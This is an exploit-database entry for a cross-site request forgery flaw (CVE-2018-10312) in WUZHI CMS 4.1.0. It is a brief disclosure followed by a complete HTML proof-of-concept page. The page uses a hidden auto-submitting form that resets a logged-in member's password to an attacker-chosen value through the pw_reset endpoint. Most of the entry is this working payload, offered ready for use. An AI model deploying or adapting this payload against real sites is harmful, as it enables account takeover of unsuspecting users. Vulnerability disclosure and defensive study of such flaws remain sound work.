# Exploit Title: WUZHI CMS 4.1.0 - Cross-Site Request Forgery# Date: 2018-04-23# Exploit Author: jiguang (s1@jiguang.in)# Vendor Homepage: https://github.com/wuzhicms/wuzhicms# Software Link: https://github.com/wuzhicms/wuzhicms# Version: 4.1.0# CVE: CVE-2018-10312
An issue was discovered in WUZHI CMS 4.1.0(https://github.com/wuzhicms/wuzhicms/issues/132)
There is acsrf vulnerability that can modifying the member's password. via index.php?m=member&v=pw_reset
After the member logged in.open the exp page
<html><body><script>history.pushState('','','/')</script><form action="http://localhost/www/index.php?m=member&v=pw_reset" method="POST"><inputtype="hidden" name="password" value="yuduo"/><inputtype="hidden" name="password2" value="yuduo"/><inputtype="hidden" name="submit" value="确 定"/><inputtype="submit" value="Submit request"/></form></body></html>
